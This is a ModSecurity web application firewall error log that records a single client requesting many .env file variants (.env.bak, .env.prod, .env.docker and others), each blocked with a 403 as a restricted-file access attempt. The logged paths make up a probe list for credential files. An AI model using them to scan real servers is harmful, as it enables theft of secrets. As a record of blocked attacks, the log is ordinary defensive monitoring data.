[Mon May 11 18:03:01.877187 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.remote"] [unique_id "agH9tUWKUxpmnkK7zHyhZgAAAQQ"]
[Mon May 11 18:03:01.877455 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tUWKUxpmnkK7zHyhZgAAAQQ"]
[Mon May 11 18:03:02.033869 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.bak"] [unique_id "agH9tkWKUxpmnkK7zHyhZwAAAQQ"]
[Mon May 11 18:03:02.034086 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.bak"] [unique_id "agH9tkWKUxpmnkK7zHyhZwAAAQQ"]
[Mon May 11 18:03:02.034370 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tkWKUxpmnkK7zHyhZwAAAQQ"]
[Mon May 11 18:03:02.262603 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.backup"] [unique_id "agH9tkWKUxpmnkK7zHyhaQAAAQQ"]
[Mon May 11 18:03:02.262832 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.backup"] [unique_id "agH9tkWKUxpmnkK7zHyhaQAAAQQ"]
[Mon May 11 18:03:02.263121 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tkWKUxpmnkK7zHyhaQAAAQQ"]
[Mon May 11 18:03:02.417477 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agH9tkWKUxpmnkK7zHyhagAAAQQ"]
[Mon May 11 18:03:02.417702 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agH9tkWKUxpmnkK7zHyhagAAAQQ"]
[Mon May 11 18:03:02.418013 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tkWKUxpmnkK7zHyhagAAAQQ"]
[Mon May 11 18:03:02.592843 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.old"] [unique_id "agH9tkWKUxpmnkK7zHyhawAAAQQ"]
[Mon May 11 18:03:02.593075 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.old"] [unique_id "agH9tkWKUxpmnkK7zHyhawAAAQQ"]
[Mon May 11 18:03:02.593408 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tkWKUxpmnkK7zHyhawAAAQQ"]
[Mon May 11 18:03:02.771297 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.sample"] [unique_id "agH9tkWKUxpmnkK7zHyhbgAAAQQ"]
[Mon May 11 18:03:02.771532 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.sample"] [unique_id "agH9tkWKUxpmnkK7zHyhbgAAAQQ"]
[Mon May 11 18:03:02.771906 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tkWKUxpmnkK7zHyhbgAAAQQ"]
[Mon May 11 18:03:02.947495 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agH9tkWKUxpmnkK7zHyhcAAAAQQ"]
[Mon May 11 18:03:02.947718 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agH9tkWKUxpmnkK7zHyhcAAAAQQ"]
[Mon May 11 18:03:02.947997 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tkWKUxpmnkK7zHyhcAAAAQQ"]
[Mon May 11 18:03:03.116010 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.dev"] [unique_id "agH9t0WKUxpmnkK7zHyhcQAAAQQ"]
[Mon May 11 18:03:03.116254 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.dev"] [unique_id "agH9t0WKUxpmnkK7zHyhcQAAAQQ"]
[Mon May 11 18:03:03.116519 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9t0WKUxpmnkK7zHyhcQAAAQQ"]
[Mon May 11 18:03:03.271638 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.prod"] [unique_id "agH9t0WKUxpmnkK7zHyhcwAAAQQ"]
[Mon May 11 18:03:03.271860 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.prod"] [unique_id "agH9t0WKUxpmnkK7zHyhcwAAAQQ"]
[Mon May 11 18:03:03.272169 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9t0WKUxpmnkK7zHyhcwAAAQQ"]
[Mon May 11 18:03:03.468487 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.stage"] [unique_id "agH9t0WKUxpmnkK7zHyhdAAAAQQ"]
[Mon May 11 18:03:03.468721 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.stage"] [unique_id "agH9t0WKUxpmnkK7zHyhdAAAAQQ"]
[Mon May 11 18:03:03.469018 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9t0WKUxpmnkK7zHyhdAAAAQQ"]
[Mon May 11 18:03:03.676775 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.ci"] [unique_id "agH9t0WKUxpmnkK7zHyhdQAAAQQ"]
[Mon May 11 18:03:03.676992 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.ci"] [unique_id "agH9t0WKUxpmnkK7zHyhdQAAAQQ"]
[Mon May 11 18:03:03.677296 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9t0WKUxpmnkK7zHyhdQAAAQQ"]
[Mon May 11 18:03:03.855605 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.docker"] [unique_id "agH9t0WKUxpmnkK7zHyhdgAAAQQ"]
[Mon May 11 18:03:03.855838 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.docker"] [unique_id "agH9t0WKUxpmnkK7zHyhdgAAAQQ"]
[Mon May 11 18:03:03.856130 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9t0WKUxpmnkK7zHyhdgAAAQQ"]
[Mon May 11 18:03:04.022004 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.live"] [unique_id "agH9uEWKUxpmnkK7zHyhdwAAAQQ"]
[Mon May 11 18:03:04.022276 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.live"] [unique_id "agH9uEWKUxpmnkK7zHyhdwAAAQQ"]
[Mon May 11 18:03:04.022575 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uEWKUxpmnkK7zHyhdwAAAQQ"]
[Mon May 11 18:03:04.192345 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.preprod"] [unique_id "agH9uEWKUxpmnkK7zHyheAAAAQQ"]
[Mon May 11 18:03:04.192569 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.preprod"] [unique_id "agH9uEWKUxpmnkK7zHyheAAAAQQ"]
